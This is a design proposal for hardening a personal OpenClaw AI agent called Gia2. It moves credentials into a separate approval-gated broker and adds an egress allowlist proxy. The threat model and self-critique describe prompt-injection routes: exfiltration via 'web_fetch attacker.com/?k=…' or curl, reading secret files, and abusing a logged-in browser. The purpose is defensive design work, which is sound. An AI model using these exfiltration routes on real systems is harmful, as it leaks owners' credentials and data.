_2026-10-02 · status: proposal, nothing built yet · stack dir (planned): ~/openclaw-gia2_
openclaw@2026.8.34 (released 2026-10-01: 113 backported fixes, all advisories against 2026.8.2 reconciled), plus OCE's core idea enforced at a container boundary, not just in policy: the agent that reads untrusted email/web holds no credentials. A separate deterministic broker holds them and only performs narrow, approved actions.| OpenClaw Enterprise | What Gia2 needs | |
|---|---|---|
| Who ships it | Official OpenClaw Foundation (began inside OpenAI; Red Hat + NVIDIA co-develop), MIT, free (blog, Techzine) | |
| Maturity | Pre-1.0, "internal pilot workloads", no releases/tags, main branch only (repo) | Production, daily-driver |
| Runtime | k3d / Kubernetes + Helm; Compose mode is a preview that cannot deploy agents (README) | Colima/Docker on the Mini |
| Channels | Slack (+ GitHub) | Telegram, WhatsApp, Twilio SMS/voice, Gmail, LinkedIn |
| Plugins | Embedded OpenClaw ships only the bundled "Diffs" plugin | ~50 Gia skills + gog, Chatterbox, browser |
| Sandbox | OpenShell driver, "not supported for production" (sandbox doc) | |
| First-agent model | Requires an OpenAI key | Claude-first fleet |
Watch out: the npm name openclaw-enterprise belonged to a squatter, who published it and pulled it the same day (registry). OCE is not on npm, so never npm install openclaw-enterprise. The other "enterprise OpenClaw" people mean is NVIDIA NemoClaw, a vendor sandbox wrapper. We already tried and parked a NemoClaw agent.
What we borrow from OCE: secrets separated from config, per-agent identity that doesn't inherit its creator's rights, default-deny egress, plugins that start empty and get approved one by one, immutable revisions (config changes go through a rebuild, not live edits), and redacted audit events.
Revisit OCE when 1.0 ships and it has Telegram/SMS channels.
Gia is the most capable agent: Opus-first model chain, ~50 skills, ~19 crons, and the only agent with Gmail, LinkedIn, the voice clone, deploy tokens, and the host Claude bridge. It's also the largest blast radius in the fleet:
| Area | Gap vs. what Gia2 should have |
|---|---|
| Version | Two release lines behind the current security rollups (releases) |
| Command execution | Broad, without per-command approval or a sandbox |
| Tool surface | No explicit allowlist |
| Credentials | Held in the same process that reads untrusted email and web content |
| Host access | A general-purpose bridge to the host |
| Health | 2 scheduled jobs failing silently |
Similar fleet-wide hygiene items (other agents) are tracked privately and fixed in Phase 3.
Every row is marked as Inherit (copied from Gia), Port (from another agent), New (must be built), or Not real (doesn't exist anywhere yet).
| Capability | Source | Gia2 plan | |
|---|---|---|---|
| Telegram (DM pairing + group allowlist) | Inherit (Gia) | Shadow: new test bot. Cutover: take over Gia's bot token | |
| Twilio SMS out + inbound relay | Inherit (Gia sms/, ~/ops/bin/txt) | Outbound in shadow; inbound relay cron moves at cutover only | |
Port (Mia channels.whatsapp) | Re-pair by QR at cutover (needs Byron's phone); Mia's WhatsApp goes off at the same moment | ||
| Email (both Gmail accounts) | Inherit (gog in the image, keyring in credentials volume) | Read in shadow; sending gated by approval | |
| LinkedIn posting + DMs | Inherit (token + Playwright session, auto-renew daemon) | Posting gated by approval, wc -c < 3000 check kept | |
| Byron's voice (Chatterbox clone) | Inherit (clone skill → ~/voice-clone, never ElevenLabs) | Same bridge, scoped key (see §4) | |
| Podcast/standup TTS, Signal Talk steering | Inherit | Moves at cutover (`[Gia\ | Model]` tag format kept so Signal Talk still parses it) |
| Presentations (reveal.js → presentations.arnao.ai) | Inherit (presentation-builder) | Same | |
| PowerPoint / Word / PDF / Excel files | New | Install the pptx/docx/pdf/xlsx skills (~/.claude/skills/synced) into Gia2 after a skill-scan | |
| Images (Gemini 3 Pro image, grok-imagine, nano-banana-pro) | Inherit + Port (Mia's nano-banana-pro) | Merge into one image skill | |
| Voice phone calls (Twilio) | New | Enable the built-in voice-call skill (disabled on Gia): outbound only, owner number allowlisted, voice = clone | |
| slog work log | New as first-class | Wrapper script + skill doc so Gia2 logs outcomes like Claude Code does | |
| Deploys (Vercel, GoDaddy DNS, Cloudflare) | Inherit | Behind approval; tokens via SecretRef/file | |
| Host Claude Code (dispatch, fable-critique, proposal-publish, vercel-deploy) | Inherit (SSH bridge) | Same, but forced-command key (§4) | |
| Model chain (Opus-first, Fable sub-agent, fallbacks) | Inherit | Same, managed by set-best-claude.sh; maxTokens set per model (the known Gia break from June) | |
| Crons (19) | Inherit | Moved at cutover; the 2 failing ones fixed first, not ported broken | |
| Skills (~50) + fleet-skills manifest | Inherit | Each passes skill-scan; relay-message (lost content) dropped | |
| Signal messenger | Not real | Nothing in the fleet speaks Signal (in our setup "Signal" is the podcast brand). Possible later via signal-cli, but out of scope unless you want it |
_Revised after the adversarial pass (see the Self-critique section). The first draft put allowlists inside one container. The critique showed most of that was theater: an agent that can cat its own SecretRef files, write a script into its allowlisted folder, or post through a logged-in browser has no real boundary._
The core risk: Gia2 reads attacker-controlled text (email, web, inbound SMS, group chats) in the same process that holds Gmail, LinkedIn, Twilio, deploy keys, and a host shell. The design separates those.
Telegram / WhatsApp / SMS-in / Gmail-read / web
│
┌──────────▼───────────┐ internal-only network ┌────────────────────────┐
│ gia2 (OpenClaw LLM) │ ─────── narrow verbs ─────▶ │ gia2-broker (no LLM) │──▶ Gmail send, LinkedIn,
│ no credentials volume│ │ holds every credential │ Twilio SMS/call, Vercel,
│ no logged-in browser │ │ renders approval tap │ GoDaddy, host jobs
└──────────┬───────────┘ │ rate-limits + slog │
│ only route out └────────────────────────┘
┌──────────▼───────────┐
│ gia2-egress (proxy) │ domain allowlist: Anthropic, OpenAI, Google, Telegram,
└──────────────────────┘ WhatsApp, Brave search, *.arnao.ai
openclaw@2026.8.34 extended-stable (the gateway-only LTS line with critical security backports). The 180s→480s compaction sed hack becomes the real config key agents.defaults.compaction.timeoutSeconds: 480 (verified in the 2026.8.34 source).models.providers.*.apiKey and channels.telegram.botToken are supported, verified in the package's docs/reference/secretref-credential-surface.md), behind a monthly spend cap. Gmail send, LinkedIn, Twilio, Vercel, GoDaddy, Cloudflare, the database URL, and the host SSH key live only in the broker. Read-only Gmail uses a separate read-scoped gog token. A compromised agent can read the mail it was already reading, and nothing more.email.reply{thread_id, body}, email.send{to, subject, body}, linkedin.post{text}, sms.send{to, body}, call.place{to, script}, deploy{project}, voice.clone{text}, host.job{name, args}, slog{…}. It builds the Telegram approval card itself from the structured arguments, so the LLM never writes the text Byron approves. Per-verb policy: auto (voice clip, slog, SMS/call to Byron's own number), tap-to-approve (email, LinkedIn, deploy, calls/SMS to anyone else), never. Rate limits per verb. Every action is logged to slog.internal: true Docker network whose only exit is a proxy container (smokescreen or squid) with a domain allowlist. That closes the "web_fetch attacker.com/?k=…" and curl exfiltration paths. The message tool is pinned to Byron's chats plus the paired-peer allowlist.Daily Podcast → deploy{project: rai} and Signal PM → sms.send{to: Byron}. These run automatically even though the cron read web/RSS content, because the arguments are fixed in advance and the model can't change where things go. Anything outside a cron's grant still needs a tap.dispatch-to-claude becomes host.job{name}: a fixed menu of templated jobs (fable-critique on a file, proposal-publish, vercel-deploy of a named project, clone-voice) run by a forced-command SSH key in the broker, with Claude Code started in restricted-permission mode. Free-text "ask host Claude anything" stays a Byron-only, tap-approved verb.linkedin.post). The agent's browser is a fresh, logged-out profile that goes through the egress proxy.node, no docker.sock, cap_drop: ALL, read-only root filesystem, explicit tools.allow and plugins.allow, and every imported skill passes skill-scan (no ClawHub auto-installs).byron/gia2-config), and changes deploy as a tagged rebuild, never as a live edit inside the container.Honest limit: a prompt-injected Gia2 can still read everything in its own context and send it to Byron, or propose a harmful action that Byron could approve by mistake. The approval card shows exactly what will be sent and to whom, to make that hard.
Phase 0: prep (≈1h, no impact on Gia)
~/openclaw-gia2 with three services: openclaw-gia2, gia2-broker, gia2-egress. Named volumes (virtiofs inode bug): gia2-agent-state | -sessions | -data for the agent, gia2-broker-credentials for the broker.Phase 1: build + shadow (≈3 days of work, spread over about a week)
openclaw-gia2:2026.8.34-slim from a copy of Gia's Dockerfile (sed patch dropped). Broker is a small Node service (~400 lines) with a JSON policy file. Egress is a stock smokescreen image.openclaw doctor migrates the 2026.7 schema → diff reviewed by hand → apply §4 → openclaw secrets audit clean.Phase 2: cutover, one channel at a time (each step reversible on its own)
docker compose down Gia (not just stop; check restart: policy and that no webhook is set) → Gia2 takes Gia's bot token. Rollback: reverse the token.Phase 3: register + clean up
~/fleet-skills/manifest.json, the set-best-claude.sh arrays, fleet-backup.sh scope, test-agent-health.sh, proj --rebuild, regenerate AGENT_FLEET.md. Gia is kept stopped (not deleted) for 14 days.gia2-shadow with honeytoken credentials replays the injection corpus nightly and after every upgrade, and alerts on any canary. "Hardened" becomes a measured nightly result, not a claim._The scripted Fable API pass was blocked this session: the auto-mode safety check refused to read the Anthropic key out of Gia's container. This pass was run as an adversarial Claude review of the first draft instead._
What it found (accepted):
workspace/scripts/* is allowlisted and the agent can write to workspace/, it can write and run anything. Approval prompts can be obfuscated. → Write credentials moved out of the agent entirely (§4.2–4.3).env. The same uid can cat the files. → Only model keys stay in the agent, behind a spend cap.message tool, and web fetch exfiltration. → The logged-in browser moves to the broker, an egress proxy is added, and message is pinned.dispatch-to-claude accepted free text. → Templated host.job; free-text becomes Byron-only and tapped.Also accepted: the optional OCE k3d pilot was busywork, so it is dropped.